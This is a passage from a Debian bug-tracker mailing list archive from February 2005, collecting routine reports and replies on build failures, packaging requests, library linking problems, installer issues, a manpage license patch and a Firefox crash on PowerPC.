make[3]: Leaving directory
`/opt/debian/build/mysql-dfsg-4.1-4.1.8a/support-files'
Making all in fs
/bin/sh: line 1: cd: fs: No such file or directory
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/opt/debian/build/mysql-dfsg-4.1-4.1.8a'
make[1]: *** [all] Error 2
make[1]: Leaving directory `/opt/debian/build/mysql-dfsg-4.1-4.1.8a'
make: *** [build-stamp] Error 2
Build command 'cd mysql-dfsg-4.1-4.1.8a && dpkg-buildpackage -b -uc'
failed.
E: Child process failed

On the Debian build machines, this failure does not occur because
the MySQLFS autoconf test fails:

checking if we should build MySQLFS... disabled because ORBIT
http://buildd.debian.org/fetch.php?&pkg=mysql-dfsg-4.1&ver=4.1.9-1&arch=ia64&stamp=1106738055&file=log&as=raw

After I deinstalled all ORBIT packages, the build succeeded.

That looks like an upstream bug. A quick solution would be to disable
MySQLFS in ./debian/rules, which does not work anyway and is not
enabled in the binary packages provided by the Debian mirrors.

Max



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293234: dhttpd: [patch] Document new -r option in manual page

2005-02-03 Thread Ola Lundqvist
tags 293234 + patch
thanks

Hello

Thanks for all the patches.

Regards,

// Ola

On Thu, Feb 03, 2005 at 08:24:17AM +0200, Jari Aalto wrote:
> Package: dhttpd
> Version: 1.02a-12
> Followup-For: Bug #293234
> 
> 
> The patch says it all.
> 
> -- System Information:
> Debian Release: 3.1
>   APT prefers unstable
>   APT policy: (500, 'unstable'), (1, 'experimental')
> Architecture: i386 (i686)
> Kernel: Linux 2.6.9-1-686
> Locale: LANG=C, LC_CTYPE=C (charmap=ISO-8859-1) (ignored: LC_ALL set to en_US)
> 
> Versions of packages dhttpd depends on:
> ii  libc6   2.3.2.ds1-20 GNU C Library: Shared libraries 
> an
> ii  libgcc1 1:3.4.3-7GCC support library
> ii  libstdc++5  1:3.3.5-8The GNU Standard C++ Library v3
> 
> -- no debconf information

> --- dhttpd.1.orig 2005-02-02 16:03:40.0 +0200
> +++ dhttpd.1  2005-02-03 08:21:52.0 +0200
> @@ -18,8 +18,12 @@
>  .B \-h
>  Show summary of options.
>  .TP
> -.B \-p portnum
> +.B \-p PORT
>  Set the port the web server runs on
> +.TP
> +.B \-r DIR
> +Set the WWW root directory /to/some/path. The path must be absolute and 
> without
> +trailing slash.
>  .SH AUTHOR
>  This manual page was written by Christoph Lameter <[EMAIL PROTECTED]>,
>  for the Debian GNU/Linux system.


-- 
 - Ola Lundqvist ---
/  [EMAIL PROTECTED] Annebergsslingan 37  \
|  [EMAIL PROTECTED] 654 65 KARLSTAD  |
|  +46 (0)54-10 14 30  +46 (0)70-332 1551   |
|  http://www.opal.dhs.org UIN/icq: 4912500 |
\  gpg/f.p.: 7090 A92B 18FE 7994 0C36  4FE4 18A1 B1CF 0FE5 3DD9 /
 ---


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292796: second the request

2005-02-03 Thread Ionutz Borcoman
Hi,
I second this request.
I was able to roll my own 2.4 python2.4-gtk deb's by just replacing the 
python2.3 with python2.4 in the debian dir. I have attached the changes 
to this mail. I believe it should be fairly simple to add these 
additional tasks to the existing ones from the debian/rules so that the 
rules builds both 2.3 and 2.4 python-gtk's (with my changes it builds 
only for 2.4).

My program worked after recompiling the C extension with no problem so far.
TIA,
--
Ionutz Borcoman
http://borco.net/


debian.tar.bz2
Description: application/bzip


Bug#293433: package python bindings as liblcms-python

2005-02-03 Thread Christoph Scheurer
Package: lcms
Severity: wishlist


Please package the python bindings to libcms which can be found in the python/
sub-directory of the lcms source tree.

-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.9
Locale: LANG=C, [EMAIL PROTECTED] (charmap=ISO-8859-15)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293112: on ppc x0rfbserver is linked against libxclass.so.0.6.2 but 0.8.3 is installed

2005-02-03 Thread Ola Lundqvist
severity 293112 serious
thanks

Hello

This probably mean that I just have to upload a new version.

I'll do that.

Regards,

// Ola

On Tue, Feb 01, 2005 at 08:34:06AM +0100, Ralf Schlatterbeck wrote:
> Package: rfb
> Version: 0.6.1-8
> Severity: important
> 
> On the powerpc architecture x0rfbserver from the rfb package is linked
> against libxclass.so.0.6.2 -- this version is no longer available, when
> installing libxclass0, 0.8.3 is installed. Error message:
> 
> [EMAIL PROTECTED]:(8)% x0rfbserver
> x0rfbserver: error while loading shared libraries: libxclass.so.0.6.2:
> cannot open shared object file: No such file or directory
> 
> [EMAIL PROTECTED]:(9)% ldd =x0rfbserver
> libz.so.1 => /usr/lib/libz.so.1 (0x0ffcd000)
> libXtst.so.6 => /usr/X11R6/lib/libXtst.so.6 (0x0ffa6000)
> libxclass.so.0.6.2 => not found
> libXpm.so.4 => /usr/X11R6/lib/libXpm.so.4 (0x0ff85000)
> libXext.so.6 => /usr/X11R6/lib/libXext.so.6 (0x0ff53000)
> libX11.so.6 => /usr/X11R6/lib/libX11.so.6 (0x0fe5a000)
> libstdc++.so.5 => /usr/lib/libstdc++.so.5 (0x0fd81000)
> libm.so.6 => /lib/libm.so.6 (0x0fcec000)
> libgcc_s.so.1 => /lib/libgcc_s.so.1 (0x0fcbe000)
> libc.so.6 => /lib/libc.so.6 (0x0fb5f000)
> libdl.so.2 => /lib/libdl.so.2 (0x0fb3c000)
> /lib/ld.so.1 => /lib/ld.so.1 (0x3000)
> 
> The problem is specific to the ppc architecture, on x86 I'm not seeing
> the problem:
> 
> [EMAIL PROTECTED]:(5)% ldd =x0rfbserver
> ...
> libxclass.so.0.8.3 => /usr/lib/libxclass.so.0.8.3 (0x4003d000)
> ...
> 
> 
> -- System Information:
> Debian Release: 3.1
>   APT prefers testing
>   APT policy: (500, 'testing')
> Architecture: powerpc (ppc)
> Kernel: Linux 2.4.27-powerpc
> Locale: LANG=en_US.ISO-8859-15, LC_CTYPE=en_US.ISO-8859-15
> 
> Versions of packages rfb depends on:
> ii  libc6 2.3.2.ds1-18   GNU C Library: Shared libraries 
> an
> ii  libgcc1   1:3.4.2-2  GCC support library
> ii  libstdc++51:3.3.4-13 The GNU Standard C++ Library v3
> ii  libx11-6  4.3.0.dfsg.1-8 X Window System protocol client 
> li
> ii  libxclass00.8.3-1C++ GUI toolkit for X
> ii  libxext6  4.3.0.dfsg.1-8 X Window System miscellaneous 
> exte
> ii  libxpm4   4.3.0.dfsg.1-8 X pixmap library
> ii  libxtst6  4.3.0.dfsg.1-8 X Window System event recording 
> an
> ii  xlibs 4.3.0.dfsg.1-8 X Window System client libraries 
> m
> ii  zlib1g1:1.2.2-3  compression library - runtime
> 
> -- no debconf information
> 
> 

-- 
 - Ola Lundqvist ---
/  [EMAIL PROTECTED] Annebergsslingan 37  \
|  [EMAIL PROTECTED] 654 65 KARLSTAD  |
|  +46 (0)54-10 14 30  +46 (0)70-332 1551   |
|  http://www.opal.dhs.org UIN/icq: 4912500 |
\  gpg/f.p.: 7090 A92B 18FE 7994 0C36  4FE4 18A1 B1CF 0FE5 3DD9 /
 ---


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293165: kopete: no add groupwise account support

2005-02-03 Thread Matías Costa
El Martes 01 Febrero 2005 16:24, Craig Cole escribió:
> Package: kopete
> Version: 4:3.3.2-1
> Severity: normal
>
> When adding an account to kopete, there is no option to use groupwise.
> Is this an oversight or intentional?

This is not a bug, is a wish.

Groupwise (aka Meanwhile) support will be in kopete KDE 3.4 release.

I'd tag this as wish + pending.



Bug#293431: mysql-dfsg-4.1 fails to build with MySQLFS enabled

2005-02-03 Thread Christian Hammers
Hello Max

On 2005-02-03 Max Kellermann wrote:
> On the Debian build machines, this failure does not occur because
> the MySQLFS autoconf test fails:
...
> That looks like an upstream bug. A quick solution would be to disable
> MySQLFS in ./debian/rules, which does not work anyway and is not
> enabled in the binary packages provided by the Debian mirrors.

Thanks for reporting. I will disable mysqlfs in the next uploads.

bye,

-christian-



pgpOHO4DSaX5i.pgp
Description: PGP signature


Bug#291634: mysql-server requires gawk?

2005-02-03 Thread Petr Ferschmann
Hello,
I got same problem when installing mysql-server as described in Bug #291634.
On machine that is installed for 2 months, debian testing. I removed 
mysql-server and tried to install it again.

I have newest coreutils, fileutils, mysql-server and awk-original.
I have a lot of space (80GiB). I fixed it by removing awk-original and 
installing gawk.
I think the command

if LC_ALL=C df --portability $DATADIR/. | awk 'END { exit ($4>1000) }'; then
is interpreted differently in gawk and in awk-original.
--
Petr Ferschmann
SoftEU s.r.o.
---
Sady Petatricatniku 31
301 00 Plzen
Czech Republic
---
Phone: +420 373 729 300
Fax:   +420 373 729 301
Cell:  +420 775 638 008
E-mail: [EMAIL PROTECTED] 

begin:vcard
fn:Ing. Petr Ferschmann
n:Ferschmann;Petr
org:SoftEU s.r.o.
adr;quoted-printable;quoted-printable:;;Sady p=C4=9Btat=C5=99ic=C3=A1tn=C3=ADk=C5=AF 31;Plze=C5=88;;301 00;Czech Republic
email;internet:[EMAIL PROTECTED]
title:Software development
tel;work:+420 373 729 300
tel;fax:+420 373 729 301
tel;cell:+420 775 638 008
url:http://www.softeu.com/
version:2.1
end:vcard



Bug#288351: Debian installer bug report

2005-02-03 Thread Frans Pop
On Thursday 03 February 2005 11:31, you wrote:
> It's a long time since I send a report.
> I had no time until now.
> I test sarge-netinstall again.
> This time the Release: Date: Mon, 31 Jan 2005 20:28:21 UTC
> I found next errors:
>
> 1. After entering hostname, partitioning begin,
>  but whit error:
>
> No partitionable media
>
> No partitionable media ware found
>
> Please check that a hard disk is attached to this machine
>
> I switch to second console and start looking what was wrong
> I found that script /lib/partman/init.d/30parted
> runs another program /bin/parted_devices,
> which can't load one shared library
>
> ~ # /bin/parted_devices
> /bin/parted_devices: error while loading shared libraries:
> libparted-1.6.so.0:
> cannot open shared object file: No such file or directory
> ~ #
>
> As workaround I did
>
> ~ # cp /lib/libparted-1.6.so.12 /lib/libparted-1.6.so.0
> ~ # /bin/parted_devices
> /dev/scsi/host0/bus0...
> /dev/scsi/host1/bus0...
> ~ # rm /var/run/parted_server.pid
>
> After this "Partition disks" from installer menu starts without errors

This is a case of unlucky timing: we started implementing a new version of 
libparted last weekend which should fix several problems. This is causing 
some breakage this week in the daily builds until all related components 
have been updated to use the new library. Should be fixed soon.

> 2.  I also checked where and how the file /boot/grub/menu.lst is set.
> In script /var/lib/dpkg/info/grub-installer.postinst is a function
> update_grub.
> Inside update_grub there is a call
> "chroot /target /sbin/update-grub"
> which create the file /boot/grub/menu.lst (on /target)
> I change  /var/lib/dpkg/info/grub-installer.postinst in a way that
> I ware able to check /target/etc/mtab and /target/etc/fstab before and
> after "update_grub".
> They ware correct.
>
> It seems to me, that /sbin/update-grub from grub package is bugy.

Yes, it does not have a good test to determine the root device of a raid1. 
I have submitted a patch to update-grub in:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=292274

It would be very nice if you could give that patch a test during an 
installation. Just apply it on /target after base-installation but before 
running grub-installer.

> 3. After reboot the swap partition is not "on"
> "cat /proc/swaps" shows nothing
> /etc/fstab has no swap entries
> I don't know which part of d-i should do that,
> or the swap is not needed anymore.

If you defined a swap partition during partitioning, d-i should add this 
to /etc/fstab for the installed system and the swap should be started 
after reboot.
Could you try this again later this week or early next week (after the 
libparted problems should be fixed)? Please submit a _new_ installation 
report with the results and attach the syslog, messages and partman log 
from the installation (available in /var/log/debian-installer after the 
reboot).

> 4. I tested this on a new machine, which is mine for next 10 day
> It include two SATA 160 GB disks, "SATA" controler is Intel ICH5
> On Internet I found, that the drivers for ICH5 are not very stable.
>
> If RAID1 mirror synhronization is run, then the kernel freeze for some
> time (from few sec to several minutes). In that time the disks
> are active, so mirror synhronization is active.
> Commands such as "cat /proc/mdstat", "ls" or login on virtual console
> freeze for some time.
>
> This happens when installing debian or after reboot, when creating
> new raid1 devices. The  problem is if the raid1 disk is big, eg. 100G.

That sounds like a kernel driver problem. It would be best to submit a 
separate bug report against the kernel-image package you are using.

> Marjan Blatnik

Thank you very much for your additional information and efforts.

Cheers,
Frans Pop


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292226: manpage looks not distributeable, as license not adhered

2005-02-03 Thread Steve Langasek
tags 292226 patch
thanks

Hello,

Please find attached a patch which adds the necessary legal incantations to
debian/copyright and debian/crack-attack-manpage.xml that allow us to
continue to distribute it.  While it may be better in the long term if the
author would be willing to relicense his manpage under a different license,
I believe this patch is sufficient to let us continue shipping the current
manpage for sarge.

If you have no objections and don't beat me to it, I will plan to NMU this
package this weekend during the bug squashing party.

Thanks,
-- 
Steve Langasek
postmodern programmer
diff -u crack-attack-1.1.10/debian/crack-attack-manpage.xml 
crack-attack-1.1.10/debian/crack-attack-manpage.xml
--- crack-attack-1.1.10/debian/crack-attack-manpage.xml
+++ crack-attack-1.1.10/debian/crack-attack-manpage.xml
@@ -26,6 +26,11 @@
  any later version published by the Free Software Foundation; with no
  Invariant Sections, no Front-Cover Texts and no Back-Cover Texts.
 
+ A copy of Version 1.2 of the Free Documentation License is included in
+ the file debian/copyright in the crack-attack source package.  This
+ file is also available in the Debian package as
+ /usr/share/doc/crack-attack/copyright.
+
 --> 
 
 
@@ -109,6 +114,12 @@
 Version 1.1 or any later version published by the Free Software
 Foundation; with no Invariant Sections, no Front-Cover Texts and
 no Back-Cover Texts.
+
+A copy of Version 1.2 of the Free Documentation License is
+included in the file debian/copyright in the crack-attack source
+package.  This file is also available in the Debian package as
+/usr/share/doc/crack-attack/copyright.
+
   
 
 
diff -u crack-attack-1.1.10/debian/copyright 
crack-attack-1.1.10/debian/copyright
--- crack-attack-1.1.10/debian/copyright
+++ crack-attack-1.1.10/debian/copyright
@@ -21,0 +22,404 @@
+The manpage crack-attack(6) is Copyright (C) 2001, 2003 Colin Walters
+and is made available under the terms of the GNU Free Documentation
+License with no Invariant Sections, no Front-Cover Texts, and no
+Back-Cover Texts.  Version 1.2 of the GNU Free Documentation License is
+as follows:
+
+
+   GNU Free Documentation License
+ Version 1.2, November 2002
+
+
+ Copyright (C) 2000,2001,2002  Free Software Foundation, Inc.
+ 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+
+0. PREAMBLE
+
+The purpose of this License is to make a manual, textbook, or other
+functional and useful document "free" in the sense of freedom: to
+assure everyone the effective freedom to copy and redistribute it,
+with or without modifying it, either commercially or noncommercially.
+Secondarily, this License preserves for the author and publisher a way
+to get credit for their work, while not being considered responsible
+for modifications made by others.
+
+This License is a kind of "copyleft", which means that derivative
+works of the document must themselves be free in the same sense.  It
+complements the GNU General Public License, which is a copyleft
+license designed for free software.
+
+We have designed this License in order to use it for manuals for free
+software, because free software needs free documentation: a free
+program should come with manuals providing the same freedoms that the
+software does.  But this License is not limited to software manuals;
+it can be used for any textual work, regardless of subject matter or
+whether it is published as a printed book.  We recommend this License
+principally for works whose purpose is instruction or reference.
+
+
+1. APPLICABILITY AND DEFINITIONS
+
+This License applies to any manual or other work, in any medium, that
+contains a notice placed by the copyright holder saying it can be
+distributed under the terms of this License.  Such a notice grants a
+world-wide, royalty-free license, unlimited in duration, to use that
+work under the conditions stated herein.  The "Document", below,
+refers to any such manual or work.  Any member of the public is a
+licensee, and is addressed as "you".  You accept the license if you
+copy, modify or distribute the work in a way requiring permission
+under copyright law.
+
+A "Modified Version" of the Document means any work containing the
+Document or a portion of it, either copied verbatim, or with
+modifications and/or translated into another language.
+
+A "Secondary Section" is a named appendix or a front-matter section of
+the Document that deals exclusively with the relationship of the
+publishers or authors of the Document to the Document's overall subject
+(or to related matters) and contains nothing that could fall directly
+within that overall subject.  (Thus, if the Document is in part a
+textbook of mathematics, a Secondary Section may not explain any
+mathematics.)  The relationship could be a matter of historical
+connection w

Bug#293409: pdbv: cronjobs "failing" to source config

2005-02-03 Thread Mathieu Roy
Justin B Rye <[EMAIL PROTECTED]> tapota :

> Package: pdbv
> Version: 2.0.9.3
> Severity: normal
> Tags: patch
>
> According to the changelog, the upgrade from 2.0.9.2 to .3 contained
> only updated translations.  However, it results in the cronjobs
> outputting an error message: 
>
>> Unable to run /etc/pdbv/pdbvrc Most commonly, it's a privilege issue.
>> Asked at /usr/bin/pdbv line 1229.
>
> This remains true after a purge and fresh default install.  A diff
> of /usr/bin/pdbv versions implies that the main change is here:

Thanks for the report. An updated version will be uploaded ASAP.

Regards,

-- 
Mathieu Roy

  +-+
  | General Homepage:   http://yeupou.coleumes.org/ |
  | Computing Homepage: http://alberich.coleumes.org/   |
  | Not a native english speaker:   |
  | http://stock.coleumes.org/doc.php?i=/misc-files/flawed-english  |
  +-+


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#281476: mozilla-firefox: also crashes on my ppc box

2005-02-03 Thread Lee Braiden
Package: mozilla-firefox
Version: 1.0+dfsg.1-2
Followup-For: Bug #281476


Hi, this is also crashing on my powerpc machine.  I had the gcj java plugin
installed previously, but now I do not, and the page it crashes on doesn't
use any java that I'm aware of.  I suspect the problem is powerpc-specific,
since the previous reporter was on ppc too.  Probably not relevant, but I'll
mention that Konqueror works fine with this page.

Here's the console output:

===

[EMAIL PROTECTED]:~$ firefox http://www.lernu.net/lernu.php?lingvo=en

(Gecko:18172): Gdk-CRITICAL **: file gdkpixbuf-drawable.c: line 1228 
(gdk_pixbuf_get_from_drawable): assertion `gdk_window_is_viewable (src)' failed

[SNIPPED: MORE TYPICAL Gdk LOGGING]

(Gecko:18172): GLib-GObject-CRITICAL **: g_object_unref: assertion 
`G_IS_OBJECT(object)' failed
NP_Initialize
New
SetWindow
Destroy
The program 'Gecko' received an X Window System error.
This probably reflects a bug in the program.
The error was 'BadShmSeg (invalid shared segment parameter)'.
  (Details: serial 26 error_code 171 request_code 147 minor_code 2)
  (Note to programmers: normally, X errors are reported asynchronously;
   that is, you will receive the error a while after causing it.
   To debug your program, run it with the --sync command line
   option to change this behavior. You can then get a meaningful
   backtrace from your debugger if you break on the gdk_x_error() function.)
[EMAIL PROTECTED]:~$

===

-- System Information:
Debian Release: 3.1
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: powerpc (ppc)
Kernel: Linux 2.6.10
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)

Versions of packages mozilla-firefox depends on:
ii  debianutils  2.11.2  Miscellaneous utilities specific t
ii  fontconfig   2.2.3-4 generic font configuration library
ii  libatk1.0-0  1.8.0-4 The ATK accessibility toolkit
ii  libc62.3.2.ds1-20GNU C Library: Shared libraries an
ii  libfontconfig1   2.2.3-4 generic font configuration library
ii  libfreetype6 2.1.7-2.3   FreeType 2 font engine, shared lib
ii  libgcc1  1:3.4.3-7   GCC support library
ii  libglib2.0-0 2.6.1-3 The GLib library of C routines
ii  libgtk2.0-0  2.4.14-2The GTK+ graphical user interface 
ii  libidl0  0.8.3-1 library for parsing CORBA IDL file
ii  libjpeg626b-9The Independent JPEG Group's JPEG 
ii  libkrb53 1.3.6-1 MIT Kerberos runtime libraries
ii  libpango1.0-01.8.0-3 Layout and rendering of internatio
ii  libpng12-0   1.2.8rel-1  PNG library - runtime
ii  libstdc++5   1:3.3.5-8   The GNU Standard C++ Library v3
ii  libx11-6 4.3.0.dfsg.1-10 X Window System protocol client li
ii  libxext6 4.3.0.dfsg.1-10 X Window System miscellaneous exte
ii  libxft2  2.1.2-6 FreeType-based font drawing librar
ii  libxp6   4.3.0.dfsg.1-10 X Window System printing extension
ii  libxrender1  0.8.3-7 X Rendering Extension client libra
ii  libxt6   4.3.0.dfsg.1-10 X Toolkit Intrinsics
ii  psmisc   21.5-1  Utilities that use the proc filesy
ii  xlibs4.3.0.dfsg.1-10 X Keyboard Extension (XKB) configu
ii  zlib1g   1:1.2.2-4   compression library - runtime

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292506: mozilla-firefox: GNOME menu is not translated

2005-02-03 Thread Jérôme Warnier
Le jeudi 03 février 2005 à 02:01 -0500, Eric Dorland a écrit :
> * Jérôme Warnier ([EMAIL PROTECTED]) wrote:
> > Le mercredi 02 février 2005 à 23:52 +0100, Mike Hommey a écrit :
> > > On Wed, Feb 02, 2005 at 11:46:27PM +0100, Jérôme Warnier <[EMAIL 
> > > PROTECTED]> wrote:
> > > > Le mercredi 02 février 2005 à 23:28 +0100, Mike Hommey a écrit :
> > > > > On Tue, Feb 01, 2005 at 12:44:02AM +0100, Jérôme Warnier <[EMAIL 
> > > > > PROTECTED]> wrote:
> > > > > > Le lundi 31 janvier 2005 à 00:40 -0500, Eric Dorland a écrit :
> > > > > > > * Jerome Warnier ([EMAIL PROTECTED]) wrote:
> > > > > > > > Package: mozilla-firefox
> > > > > > > > Version: 1.0+dfsg.1-2
> > > > > > > > Severity: wishlist
> > > > > > > > 
> > > > > > > > /usr/share/applications/mozilla-firefox.desktop obviously does 
> > > > > > > > not
> > > > > > > > contain tranlsations.
> > > > > > > 
> > > > > > > No, it's not. I will incorporate any translations people care to
> > > > > > > provide. 
> > > > > > There is no upstream translation for that at all?
> > > > > > 
> > > > > > I borrowed Galeon's .desktop file and attached it here.
> > > > > 
> > > > > I don't get why "Mozilla Firefox" is translated into "Navigateur Web 
> > > > > Firefox". Why not just keep the name ?
> > > > Because that's the way it is done for other browsers (Galeon and
> > > > Epiphany at least) because everybody does not necessarily know what
> > > > "Mozilla Firefox" is about.
> > > 
> > > I think it's not translators role to decide whether to name programs in
> > > a new way for convenience for the user. I think you should first
> > > try to get the original version changed for this reason.
> > > 
> > > OTOH, as for .desktop files, comments are there to enlight the user
> > > about what the program does.
> > At least for consistency with the others, it should be left like that
> > for now.
> > If you want to fight against that, don't come to me, but to all the
> > other packagers (or maybe even upstream, I honestly don't know, and
> > don't care).
> 
> I have to agree with Mike here. I actually kind of thought that was
> weird when I applied the patch, but it didn't register strongly enough
> in my brain. Unless we want to translate it to "Renard de feu" or
> something, I think it should be left alone. 
Could you then see that with the maintainers of other browsers which do like 
that?
As I said, I personally don't care, except that I want to have something
consistent in my menus.




Bug#291634: mysql-server requires gawk?

2005-02-03 Thread Christian Hammers
Hello Petr

On 2005-02-03 Petr Ferschmann wrote:
> if LC_ALL=C df --portability $DATADIR/. | awk 'END { exit ($4>1000) }'; then
> 
> is interpreted differently in gawk and in awk-original.

Uh, it looks so simple... :-)
But thanks for the hint, I will check this and alter the dependencies
if necessary. (Or do you know how the above can be written in a portable
way?)

bye,

-christian-



pgpOuA0PN2ewD.pgp
Description: PGP signature


Bug#288353: packaged gnochm

2005-02-03 Thread pabs
On Thu, 2005-02-03 at 15:14 +0800, pabs wrote:

> I'm slowly working on gnochm now.

I've made an initial packaging of gnochm, you can get it here:
http://bonedaddy.net/pabs3/debian/

-- 
bye,
pabs


signature.asc
Description: This is a digitally signed message part


Bug#293434: cupsys: upgrade breaks at chmod backen dirs.

2005-02-03 Thread Andreas Rabus
Package: cupsys
Version: 1.1.23-3
Severity: important

It an installation or upgrade error. Was esay to fix by hand.

At the last dist-upgrade cupsys the installer broke with the following errors.

Setting up cupsys (1.1.23-3) ...
chmod: cannot access `scsi': No such file or directory
chmod: cannot access `serial': No such file or directory
chmod: cannot access `socket': No such file or directory
chmod: cannot access `usb': No such file or directory
.
.
.
chmod: cannot access `/usr/lib/cups/backend/socket': No such file or directory

I fixed it with "mkdir ...".

Just FYI...

And thanks for your work at CUPS.

 
-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (990, 'testing'), (99, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.7
Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15)

Versions of packages cupsys depends on:
ii  adduser 3.59 Add and remove users and groups
ii  debconf 1.4.30.11Debian configuration management sy
ii  libc6   2.3.2.ds1-20 GNU C Library: Shared libraries an
ii  libcupsimage2   1.1.23-3 Common UNIX Printing System(tm) - 
ii  libcupsys2-gnutls10 1.1.23-3 Common UNIX Printing System(tm) - 
ii  libgnutls11 1.0.16-9 GNU TLS library - runtime library
ii  libpam0g0.76-22  Pluggable Authentication Modules l
ii  libpaper1   1.1.14-3 Library for handling paper charact
ii  libslp1 1.0.11-7 OpenSLP libraries
ii  patch   2.5.9-2  Apply a diff file to an original
ii  perl-modules5.8.4-5  Core Perl modules
ii  xpdf-utils  3.00-12  Portable Document Format (PDF) sui
ii  zlib1g  1:1.2.2-3compression library - runtime

-- debconf information:
  cupsys/raw-print: true
* cupsys/backend: ipp, lpd, parallel, socket


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#291045: scim-chinese: scim should handle 'apostrophe situations' better

2005-02-03 Thread Michael Stroucken
Ming Hua wrote:
Thanks for reporting.  As you've said, the apostrophe is necessary in
case of ambiguity.  In your example it seems ``gong an ju'' is not
ambiguous since ``gon'' is not a valid syllable.  However scim is giving
the correct response according to your setting.
You are seeing scim taking g, o, n and g as separate characters because
you had setting ``accept incomplete pinyin'' on.  This is desireable in
cases people want to only type the consonants of a multi-char word.  For
example, they can just type ``hypy'' for ``æèæé''.  I personally
don't like this feature, but many others think it indispensable.  And it
is on by default in scim-chinese.  In this case, you get the character
``å'' just from ``g'', so scim still consider o, n and g not
interpreted.
So if you don't want this feature, you can turn it off in setup,
IMEngine -> Smart Pinyin -> tab Pinyin.  If you set it this way, you are
not going to get the remaining o, n and g.  However scim still can't do
advance match as there is not ambiguity, but I think that's another
issue.
Are you satisfied with this solution?
 

Hmm, not really. But I just wanted upstream to know about the issue. My 
recollection may be incorrect, but I think the pinyin standard says 
apostrophes are only required when there is ambiguity, but there is no 
ambiguity in the string "gonganju". Scim should always display possible 
complete pinyin solutions even if incomplete pinyin is turned on. After 
all, I can mix incomplete pinyin within a set of words and it doesn't 
get confused.

Maybe have something like:-
1) Either this letter is the last of previous character or
2) the first of the next character or
3) is part of incomplete pinyin
and offer choices in that order.
Greetings,
Michael.
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]


Bug#293123: apache: Please add mod_spambot

2005-02-03 Thread Tollef Fog Heen

retitle 293123 RFP: spambot -- prevent unwanted site downloads
reassign 293123 wnpp
thanks

* Nigel Horne 

| Package: apache
| Version: 1.3.33-3
| Severity: wishlist
| 
| Please add mod_spambot to your distribution.

It is an add-on module, so it would have to be packaged seperately
from apache itself.  I've changed your request into a RFP (Request for
Package) so somebody might pick it up.

The description on http://spambot.sf.net reads as follows (for whoever
wants to package this):

: Spambot - prevent unwanted site downloads
: 
: Mod_Spambot is an Apache plugin which monitors the data being
: downloaded from a server. When the number of requests for a client
: exceeds a preset level no more downloads are allowed for a preset
: time. When this happens the client received a tailored message
: informing them of what has happend. Many of the features can be
: tailored to the needs of the webmaster to help to prevent false
: positives and to customise the definition of a client to be
: blacklisted.
: 
: If a client, that has not been whitelisted, downloads more than 100
: pages in an hour they are blacklisted unless there has been more
: than 10 minutes between the downloads. All the figures are
: configurable - those values are the defaults.
: 
: The algorithm is simple, but surprisingly effective. No doubt it
: will improve with time and feedback. When an IP is blacklisted, it
: receives either a bespoke page, or the default 403 ErrorDocument. An
: IP is then blacklisted until 10 minutes elapses between
: requests. HEAD requests are ignored.

-- 
Tollef Fog Heen,''`.
UNIX is user friendly, it's just picky about who its friends are  : :' :
  `. `' 
`-  


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292274: [patch] update-grub: Add support for software raid1

2005-02-03 Thread Frans Pop
On Thursday 03 February 2005 07:31, you wrote:
> If I include this patch should I depend/suggest mdadm?

No, just use it if it's there (that's one reason why I included the '-x' 
test). If mdadm is not there, it's most probably not a software raid 
system anyway.
As you can see, if anything goes wrong in the new function, update-grub 
reverts to old behavior.

> What about just parsing /proc/mdstat?
>
> [EMAIL PROTECTED] root]# cat /proc/mdstat
> Personalities : [raid0]
> read_ahead 1024 sectors
> md0 : active raid0 sdb1[1] sda1[0]
>   71681792 blocks 4k chunks
>
> unused devices: 

This is the output of /proc/mdstat on an installed system:
Personalities : [raid1]
read_ahead 1024 sectors
md1 : active raid1 ide/host0/bus0/target0/lun0/part9[0] 
scsi/host0/bus0/target0/lun0/part1[1]
  12956288 blocks [2/2] [UU]

md0 : active raid1 ide/host0/bus0/target0/lun0/part5[0]
  35840896 blocks [2/1] [U_]

unused devices: 

This is the output of mdadm -D -b /dev/md0 on the same system:
ARRAY /dev/md0 level=raid1 num-devices=2 
UUID=7b48753a:12078a9c:6460070e:951f510f
   devices=/dev/hda5

As you can see, using /proc/mdstat would require a conversion from kernel 
notation of the device that's found.
AFAICT mdadm always provides the correct notation.

Cheers,
Frans


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293435: vserver-debiantools: VREBOOT_LOCATION is set to the old location

2005-02-03 Thread Erik Rossen
Package: vserver-debiantools
Version: 0.1.7
Severity: normal

